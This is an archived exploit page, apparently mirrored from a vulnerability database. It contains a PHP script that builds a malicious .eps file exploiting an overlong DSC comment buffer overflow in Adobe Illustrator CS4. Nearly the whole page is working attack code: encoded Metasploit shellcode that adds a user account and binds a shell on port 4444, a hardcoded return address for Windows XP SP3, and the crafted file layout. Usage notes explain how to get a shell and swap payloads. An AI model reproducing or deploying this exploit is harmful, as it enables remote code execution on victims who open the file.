Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22872
HistoryDec 04, 2009 - 12:00 a.m.

Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) Overlong DSC Comment Buffer Overflow Exploit

2009-12-0400:00:00
vulners.com
11

<?php
/*
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
overlong DSC Comment Buffer Overflow Exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

An overlong string as DSC comment &#40;more than 42000 bytes&#41;
results in a direct EIP overwrite.
Exception is first-chance so the program will never crash.
At the moment of the redirection EAX and ESI are user-controlled.
This portion of the buffer begins with &#39;&#37;&#39; &#40;it is the next DSC
comment&#41; but as you can see the resulting pattern is 
nop-equivalent.
 
Tested and working against xp sp3
change the call esi if you need, must be alphabetic
I used a &quot;call esi&quot; from comctl32.dll on xp sp3,
change if needed.
 
Usage: php 9sg_illu.php
then double-click on the resulting 9sg.eps file
it will bind a shell on port 4444
change the shellcode for your needs even.
 
*/
 
# windows/adduser - 446 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=adobe, PASS=kills
$_scode_i = &quot;&#92;xda&#92;xc9&#92;xd9&#92;x74&#92;x24&#92;xf4&#92;x59&#92;x49&#92;x49&#92;x49&#92;x49&#92;x49&#92;x49&#92;x49&quot; .
            &quot;&#92;x49&#92;x49&#92;x49&#92;x43&#92;x43&#92;x43&#92;x43&#92;x43&#92;x43&#92;x43&#92;x37&#92;x51&#92;x5a&#92;x6a&quot; . 
            &quot;&#92;x41&#92;x58&#92;x50&#92;x30&#92;x41&#92;x30&#92;x41&#92;x6b&#92;x41&#92;x41&#92;x51&#92;x32&#92;x41&#92;x42&quot; . 
            &quot;&#92;x32&#92;x42&#92;x42&#92;x30&#92;x42&#92;x42&#92;x41&#92;x42&#92;x58&#92;x50&#92;x38&#92;x41&#92;x42&#92;x75&quot; . 
            &quot;&#92;x4a&#92;x49&#92;x4b&#92;x4c&#92;x4a&#92;x48&#92;x47&#92;x34&#92;x43&#92;x30&#92;x43&#92;x30&#92;x45&#92;x50&quot; . 
            &quot;&#92;x4c&#92;x4b&#92;x47&#92;x35&#92;x47&#92;x4c&#92;x4c&#92;x4b&#92;x43&#92;x4c&#92;x45&#92;x55&#92;x43&#92;x48&quot; . 
            &quot;&#92;x45&#92;x51&#92;x4a&#92;x4f&#92;x4c&#92;x4b&#92;x50&#92;x4f&#92;x44&#92;x58&#92;x4c&#92;x4b&#92;x51&#92;x4f&quot; . 
            &quot;&#92;x51&#92;x30&#92;x45&#92;x51&#92;x4a&#92;x4b&#92;x47&#92;x39&#92;x4c&#92;x4b&#92;x50&#92;x34&#92;x4c&#92;x4b&quot; . 
            &quot;&#92;x43&#92;x31&#92;x4a&#92;x4e&#92;x50&#92;x31&#92;x49&#92;x50&#92;x4a&#92;x39&#92;x4e&#92;x4c&#92;x4d&#92;x54&quot; . 
            &quot;&#92;x49&#92;x50&#92;x44&#92;x34&#92;x45&#92;x57&#92;x49&#92;x51&#92;x48&#92;x4a&#92;x44&#92;x4d&#92;x43&#92;x31&quot; . 
            &quot;&#92;x49&#92;x52&#92;x4a&#92;x4b&#92;x4a&#92;x54&#92;x47&#92;x4b&#92;x46&#92;x34&#92;x47&#92;x54&#92;x43&#92;x34&quot; . 
            &quot;&#92;x43&#92;x45&#92;x4a&#92;x45&#92;x4c&#92;x4b&#92;x51&#92;x4f&#92;x47&#92;x54&#92;x43&#92;x31&#92;x4a&#92;x4b&quot; . 
            &quot;&#92;x45&#92;x36&#92;x4c&#92;x4b&#92;x44&#92;x4c&#92;x50&#92;x4b&#92;x4c&#92;x4b&#92;x51&#92;x4f&#92;x45&#92;x4c&quot; . 
            &quot;&#92;x45&#92;x51&#92;x4a&#92;x4b&#92;x4c&#92;x4b&#92;x45&#92;x4c&#92;x4c&#92;x4b&#92;x43&#92;x31&#92;x4a&#92;x4b&quot; . 
            &quot;&#92;x4d&#92;x59&#92;x51&#92;x4c&#92;x47&#92;x54&#92;x44&#92;x44&#92;x48&#92;x43&#92;x51&#92;x4f&#92;x50&#92;x31&quot; . 
            &quot;&#92;x4b&#92;x46&#92;x43&#92;x50&#92;x46&#92;x36&#92;x45&#92;x34&#92;x4c&#92;x4b&#92;x47&#92;x36&#92;x50&#92;x30&quot; . 
            &quot;&#92;x4c&#92;x4b&#92;x47&#92;x30&#92;x44&#92;x4c&#92;x4c&#92;x4b&#92;x42&#92;x50&#92;x45&#92;x4c&#92;x4e&#92;x4d&quot; . 
            &quot;&#92;x4c&#92;x4b&#92;x42&#92;x48&#92;x43&#92;x38&#92;x4b&#92;x39&#92;x4a&#92;x58&#92;x4c&#92;x43&#92;x49&#92;x50&quot; .
            &quot;&#92;x42&#92;x4a&#92;x46&#92;x30&#92;x42&#92;x48&#92;x4c&#92;x30&#92;x4d&#92;x5a&#92;x44&#92;x44&#92;x51&#92;x4f&quot; .
            &quot;&#92;x45&#92;x38&#92;x4d&#92;x48&#92;x4b&#92;x4e&#92;x4c&#92;x4a&#92;x44&#92;x4e&#92;x51&#92;x47&#92;x4b&#92;x4f&quot; .
            &quot;&#92;x4d&#92;x37&#92;x42&#92;x43&#92;x42&#92;x4d&#92;x42&#92;x44&#92;x46&#92;x4e&#92;x45&#92;x35&#92;x43&#92;x48&quot; .
            &quot;&#92;x42&#92;x45&#92;x51&#92;x30&#92;x46&#92;x4f&#92;x45&#92;x33&#92;x47&#92;x50&#92;x42&#92;x4e&#92;x42&#92;x45&quot; .
            &quot;&#92;x42&#92;x54&#92;x51&#92;x30&#92;x43&#92;x45&#92;x43&#92;x43&#92;x45&#92;x35&#92;x43&#92;x42&#92;x51&#92;x30&quot; .
            &quot;&#92;x45&#92;x31&#92;x45&#92;x34&#92;x42&#92;x4f&#92;x42&#92;x42&#92;x43&#92;x55&#92;x47&#92;x50&#92;x42&#92;x4b&quot; .
            &quot;&#92;x45&#92;x39&#92;x42&#92;x4c&#92;x42&#92;x4c&#92;x42&#92;x53&#92;x51&#92;x30&#92;x46&#92;x4f&#92;x51&#92;x51&quot; .
            &quot;&#92;x47&#92;x34&#92;x50&#92;x44&#92;x51&#92;x30&#92;x47&#92;x56&#92;x51&#92;x36&#92;x51&#92;x30&#92;x42&#92;x4e&quot; .
            &quot;&#92;x42&#92;x45&#92;x44&#92;x34&#92;x47&#92;x50&#92;x42&#92;x4c&#92;x42&#92;x4f&#92;x42&#92;x43&#92;x45&#92;x31&quot; .
            &quot;&#92;x42&#92;x4c&#92;x43&#92;x57&#92;x43&#92;x42&#92;x42&#92;x4f&#92;x44&#92;x35&#92;x44&#92;x30&#92;x47&#92;x50&quot; .
            &quot;&#92;x47&#92;x31&#92;x42&#92;x44&#92;x42&#92;x4d&#92;x42&#92;x49&#92;x42&#92;x4e&#92;x45&#92;x39&#92;x42&#92;x53&quot; .
            &quot;&#92;x43&#92;x44&#92;x42&#92;x52&#92;x45&#92;x31&#92;x43&#92;x44&#92;x42&#92;x4f&#92;x44&#92;x32&#92;x44&#92;x33&quot; .
            &quot;&#92;x51&#92;x30&#92;x45&#92;x31&#92;x45&#92;x34&#92;x42&#92;x4f&#92;x43&#92;x52&#92;x42&#92;x45&#92;x47&#92;x50&quot; . 
            &quot;&#92;x46&#92;x4f&#92;x47&#92;x31&#92;x47&#92;x34&#92;x51&#92;x54&#92;x45&#92;x50&#92;x41&#92;x41&quot;;
 
# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
$_scode_ii = &quot;&#92;x89&#92;xe5&#92;xda&#92;xd0&#92;xd9&#92;x75&#92;xf4&#92;x5e&#92;x56&#92;x59&#92;x49&#92;x49&#92;x49&#92;x49&quot; .
             &quot;&#92;x49&#92;x49&#92;x49&#92;x49&#92;x49&#92;x49&#92;x43&#92;x43&#92;x43&#92;x43&#92;x43&#92;x43&#92;x37&#92;x51&quot; .
             &quot;&#92;x5a&#92;x6a&#92;x41&#92;x58&#92;x50&#92;x30&#92;x41&#92;x30&#92;x41&#92;x6b&#92;x41&#92;x41&#92;x51&#92;x32&quot; . 
             &quot;&#92;x41&#92;x42&#92;x32&#92;x42&#92;x42&#92;x30&#92;x42&#92;x42&#92;x41&#92;x42&#92;x58&#92;x50&#92;x38&#92;x41&quot; .
             &quot;&#92;x42&#92;x75&#92;x4a&#92;x49&#92;x4b&#92;x4c&#92;x43&#92;x5a&#92;x4a&#92;x4b&#92;x50&#92;x4d&#92;x4d&#92;x38&quot; . 
             &quot;&#92;x4b&#92;x49&#92;x4b&#92;x4f&#92;x4b&#92;x4f&#92;x4b&#92;x4f&#92;x45&#92;x30&#92;x4c&#92;x4b&#92;x42&#92;x4c&quot; .
             &quot;&#92;x46&#92;x44&#92;x51&#92;x34&#92;x4c&#92;x4b&#92;x47&#92;x35&#92;x47&#92;x4c&#92;x4c&#92;x4b&#92;x43&#92;x4c&quot; . 
             &quot;&#92;x43&#92;x35&#92;x43&#92;x48&#92;x43&#92;x31&#92;x4a&#92;x4f&#92;x4c&#92;x4b&#92;x50&#92;x4f&#92;x42&#92;x38&quot; .
             &quot;&#92;x4c&#92;x4b&#92;x51&#92;x4f&#92;x47&#92;x50&#92;x43&#92;x31&#92;x4a&#92;x4b&#92;x51&#92;x59&#92;x4c&#92;x4b&quot; .
             &quot;&#92;x46&#92;x54&#92;x4c&#92;x4b&#92;x43&#92;x31&#92;x4a&#92;x4e&#92;x50&#92;x31&#92;x49&#92;x50&#92;x4a&#92;x39&quot; .
             &quot;&#92;x4e&#92;x4c&#92;x4d&#92;x54&#92;x49&#92;x50&#92;x43&#92;x44&#92;x45&#92;x57&#92;x49&#92;x51&#92;x49&#92;x5a&quot; .
             &quot;&#92;x44&#92;x4d&#92;x43&#92;x31&#92;x49&#92;x52&#92;x4a&#92;x4b&#92;x4c&#92;x34&#92;x47&#92;x4b&#92;x50&#92;x54&quot; .
             &quot;&#92;x51&#92;x34&#92;x46&#92;x48&#92;x43&#92;x45&#92;x4b&#92;x55&#92;x4c&#92;x4b&#92;x51&#92;x4f&#92;x47&#92;x54&quot; . 
             &quot;&#92;x45&#92;x51&#92;x4a&#92;x4b&#92;x42&#92;x46&#92;x4c&#92;x4b&#92;x44&#92;x4c&#92;x50&#92;x4b&#92;x4c&#92;x4b&quot; . 
             &quot;&#92;x51&#92;x4f&#92;x45&#92;x4c&#92;x43&#92;x31&#92;x4a&#92;x4b&#92;x45&#92;x53&#92;x46&#92;x4c&#92;x4c&#92;x4b&quot; . 
             &quot;&#92;x4b&#92;x39&#92;x42&#92;x4c&#92;x47&#92;x54&#92;x45&#92;x4c&#92;x45&#92;x31&#92;x48&#92;x43&#92;x46&#92;x51&quot; .                  
             &quot;&#92;x49&#92;x4b&#92;x45&#92;x34&#92;x4c&#92;x4b&#92;x50&#92;x43&#92;x50&#92;x30&#92;x4c&#92;x4b&#92;x51&#92;x50&quot; .
             &quot;&#92;x44&#92;x4c&#92;x4c&#92;x4b&#92;x44&#92;x30&#92;x45&#92;x4c&#92;x4e&#92;x4d&#92;x4c&#92;x4b&#92;x51&#92;x50&quot; .
             &quot;&#92;x43&#92;x38&#92;x51&#92;x4e&#92;x45&#92;x38&#92;x4c&#92;x4e&#92;x50&#92;x4e&#92;x44&#92;x4e&#92;x4a&#92;x4c&quot; . 
             &quot;&#92;x50&#92;x50&#92;x4b&#92;x4f&#92;x48&#92;x56&#92;x45&#92;x36&#92;x50&#92;x53&#92;x43&#92;x56&#92;x45&#92;x38&quot; .
             &quot;&#92;x50&#92;x33&#92;x46&#92;x52&#92;x45&#92;x38&#92;x44&#92;x37&#92;x43&#92;x43&#92;x47&#92;x42&#92;x51&#92;x4f&quot; . 
             &quot;&#92;x51&#92;x44&#92;x4b&#92;x4f&#92;x4e&#92;x30&#92;x45&#92;x38&#92;x48&#92;x4b&#92;x4a&#92;x4d&#92;x4b&#92;x4c&quot; .
             &quot;&#92;x47&#92;x4b&#92;x50&#92;x50&#92;x4b&#92;x4f&#92;x49&#92;x46&#92;x51&#92;x4f&#92;x4c&#92;x49&#92;x4a&#92;x45&quot; . 
             &quot;&#92;x45&#92;x36&#92;x4b&#92;x31&#92;x4a&#92;x4d&#92;x43&#92;x38&#92;x43&#92;x32&#92;x51&#92;x45&#92;x42&#92;x4a&quot; .
             &quot;&#92;x45&#92;x52&#92;x4b&#92;x4f&#92;x48&#92;x50&#92;x45&#92;x38&#92;x4e&#92;x39&#92;x44&#92;x49&#92;x4b&#92;x45&quot; . 
             &quot;&#92;x4e&#92;x4d&#92;x46&#92;x37&#92;x4b&#92;x4f&#92;x48&#92;x56&#92;x50&#92;x53&#92;x46&#92;x33&#92;x51&#92;x43&quot; .
             &quot;&#92;x51&#92;x43&#92;x46&#92;x33&#92;x51&#92;x53&#92;x46&#92;x33&#92;x51&#92;x53&#92;x46&#92;x33&#92;x4b&#92;x4f&quot; . 
             &quot;&#92;x4e&#92;x30&#92;x45&#92;x36&#92;x45&#92;x38&#92;x42&#92;x31&#92;x51&#92;x4c&#92;x45&#92;x36&#92;x46&#92;x33&quot; .
             &quot;&#92;x4b&#92;x39&#92;x4d&#92;x31&#92;x4a&#92;x35&#92;x42&#92;x48&#92;x4e&#92;x44&#92;x44&#92;x5a&#92;x42&#92;x50&quot; . 
             &quot;&#92;x49&#92;x57&#92;x51&#92;x47&#92;x4b&#92;x4f&#92;x49&#92;x46&#92;x43&#92;x5a&#92;x44&#92;x50&#92;x50&#92;x51&quot; .
             &quot;&#92;x51&#92;x45&#92;x4b&#92;x4f&#92;x48&#92;x50&#92;x42&#92;x48&#92;x49&#92;x34&#92;x4e&#92;x4d&#92;x46&#92;x4e&quot; . 
             &quot;&#92;x4d&#92;x39&#92;x51&#92;x47&#92;x4b&#92;x4f&#92;x48&#92;x56&#92;x51&#92;x43&#92;x51&#92;x45&#92;x4b&#92;x4f&quot; .
             &quot;&#92;x48&#92;x50&#92;x42&#92;x48&#92;x4d&#92;x35&#92;x51&#92;x59&#92;x4b&#92;x36&#92;x51&#92;x59&#92;x50&#92;x57&quot; . 
             &quot;&#92;x4b&#92;x4f&#92;x4e&#92;x36&#92;x46&#92;x30&#92;x50&#92;x54&#92;x46&#92;x34&#92;x51&#92;x45&#92;x4b&#92;x4f&quot; .
             &quot;&#92;x4e&#92;x30&#92;x4c&#92;x53&#92;x45&#92;x38&#92;x4d&#92;x37&#92;x43&#92;x49&#92;x48&#92;x46&#92;x44&#92;x39&quot; . 
             &quot;&#92;x50&#92;x57&#92;x4b&#92;x4f&#92;x4e&#92;x36&#92;x46&#92;x35&#92;x4b&#92;x4f&#92;x4e&#92;x30&#92;x43&#92;x56&quot; .
             &quot;&#92;x42&#92;x4a&#92;x43&#92;x54&#92;x42&#92;x46&#92;x43&#92;x58&#92;x45&#92;x33&#92;x42&#92;x4d&#92;x4d&#92;x59&quot; . 
             &quot;&#92;x4d&#92;x35&#92;x43&#92;x5a&#92;x46&#92;x30&#92;x51&#92;x49&#92;x47&#92;x59&#92;x48&#92;x4c&#92;x4b&#92;x39&quot; .
             &quot;&#92;x4d&#92;x37&#92;x43&#92;x5a&#92;x50&#92;x44&#92;x4d&#92;x59&#92;x4b&#92;x52&#92;x50&#92;x31&#92;x49&#92;x50&quot; .
             &quot;&#92;x4c&#92;x33&#92;x4e&#92;x4a&#92;x4b&#92;x4e&#92;x47&#92;x32&#92;x46&#92;x4d&#92;x4b&#92;x4e&#92;x47&#92;x32&quot; .
             &quot;&#92;x46&#92;x4c&#92;x4c&#92;x53&#92;x4c&#92;x4d&#92;x43&#92;x4a&#92;x46&#92;x58&#92;x4e&#92;x4b&#92;x4e&#92;x4b&quot; .
             &quot;&#92;x4e&#92;x4b&#92;x43&#92;x58&#92;x42&#92;x52&#92;x4b&#92;x4e&#92;x48&#92;x33&#92;x44&#92;x56&#92;x4b&#92;x4f&quot; .
             &quot;&#92;x44&#92;x35&#92;x47&#92;x34&#92;x4b&#92;x4f&#92;x48&#92;x56&#92;x51&#92;x4b&#92;x51&#92;x47&#92;x46&#92;x32&quot; .
             &quot;&#92;x46&#92;x31&#92;x50&#92;x51&#92;x50&#92;x51&#92;x42&#92;x4a&#92;x45&#92;x51&#92;x50&#92;x51&#92;x50&#92;x51&quot; .
             &quot;&#92;x51&#92;x45&#92;x50&#92;x51&#92;x4b&#92;x4f&#92;x4e&#92;x30&#92;x42&#92;x48&#92;x4e&#92;x4d&#92;x49&#92;x49&quot; .
             &quot;&#92;x43&#92;x35&#92;x48&#92;x4e&#92;x51&#92;x43&#92;x4b&#92;x4f&#92;x49&#92;x46&#92;x43&#92;x5a&#92;x4b&#92;x4f&quot; . 
             &quot;&#92;x4b&#92;x4f&#92;x50&#92;x37&#92;x4b&#92;x4f&#92;x4e&#92;x30&#92;x4c&#92;x4b&#92;x46&#92;x37&#92;x4b&#92;x4c&quot; . 
             &quot;&#92;x4d&#92;x53&#92;x48&#92;x44&#92;x45&#92;x34&#92;x4b&#92;x4f&#92;x4e&#92;x36&#92;x50&#92;x52&#92;x4b&#92;x4f&quot; . 
             &quot;&#92;x4e&#92;x30&#92;x42&#92;x48&#92;x4a&#92;x50&#92;x4d&#92;x5a&#92;x44&#92;x44&#92;x51&#92;x4f&#92;x50&#92;x53&quot; . 
             &quot;&#92;x4b&#92;x4f&#92;x4e&#92;x36&#92;x4b&#92;x4f&#92;x48&#92;x50&#92;x41&#92;x41&quot;;
 
$_eip = &quot;&#92;x57&#92;x6b&#92;x41&#92;x77&quot;; //0x77416b57 alphabetic call esi, comctl32.dll
 
$_boom = &quot;&#92;xc5&#92;xd0&#92;xd3&#92;xc6&#92;x20&#92;x00&#92;x00&#92;x00&#92;x05&#92;xc8&#92;x04&#92;x00&#92;x00&#92;x00&quot;.
         &quot;&#92;x00&#92;x00&#92;x00&#92;x00&#92;x00&#92;x00&#37;&#92;xc8&#92;x04&#92;x00&#92;xb5I&#92;x01&#92;x00&#92;xff&quot;.
         &quot;&#92;xff&#92;x00&#92;x00&quot;.
         &quot;&#37;!PS-Adobe-3.1&#92;x20EPSF-3.0&#92;r&#92;n&quot;. 
         &quot;&#37;ADO_DSC_Encoding:&#92;x20Windows&#92;x20Roman&#92;r&#92;n&quot;.
         &quot;&#37;&quot;.
         str_repeat&#40;&quot;A&quot;, 41699&#41;. 
         $_eip. 
         str_repeat&#40;&quot;A&quot;, 2291&#41;. 
         &quot;&#37;Title:&#92;x20Untitled-1.eps&#92;r&#92;n&quot;. 
         &quot;&#37;AAAAAAAA&quot;. // we jump here, nop-equivalent
         $_scode_ii. 
         &quot;: A&#92;r&#92;n&quot;. 
         &quot;&#37;&#37;For:&#92;x20alias&#92;r&#92;n&quot;. 
         &quot;&#37;&#37;CreationDate:&#92;x2011/27/2009&#92;r&#92;n&quot;.
         &quot;&#37;&#37;BoundingBox:&#92;x200&#92;x200&#92;x20227&#92;x20171&#92;r&#92;n&quot;. 
         &quot;&#37;&#37;HiResBoundingBox:&#92;x200&#92;x200&#92;x20226.5044&#92;x20170.3165&#92;r&#92;n&quot;.
         &quot;&#37;&#37;CropBox:&#92;x200&#92;x200&#92;x20226.5044&#92;x20170.3165&#92;r&#92;n&quot;. 
         &quot;&#37;&#37;LanguageLevel:&#92;x202&#92;r&#92;n&quot;. 
         &quot;&#37;&#37;DocumentData:&#92;x20Clean7Bit&#92;r&#92;n&quot;. 
         &quot;&#37;ADOBeginClientInjection:&#92;x20DocumentHeader&#92;x20&#92;&quot;AI11EPS&#92;&quot;&#92;r&#92;n&quot;. 
         &quot;&#37;&#37;AI8_CreatorVersion:&#92;x2014.0.0&#92;r&quot;.
         &quot;&#37;AI9_PrintingDataBegin&#92;r&quot;.
         &quot;&#37;ADO_BuildNumber:&#92;x20Adobe&#92;x20Illustrator&#40;R&#41;&#92;x2014.0.0&#92;x20x367&#92;x20R&#92;x20agm&#92;x204.4890&#92;x20ct&#92;x205.1541&#92;r&quot;.
         &quot;&#37;ADO_ContainsXMP:&#92;x20MainFirst&#92;r&quot;. 
         &quot;&#37;AI7_Thumbnail:&#92;x20128&#92;x2096&#92;x208&#92;r&quot;. 
         &quot;&#37;&#37;BeginData:&#92;x204096&#92;x20Hex&#92;x20Bytes&#92;r&quot;. 
         &quot;&#37;0000330000660000990000CC0033000033330033660033990033CC0033FF&#92;r&#92;n&quot;;
file_put_contents&#40;&quot;9sg.eps&quot;, $_boom&#41;;

?>

original url: http://retrogod.altervista.org/9sg_adobe_illuso.html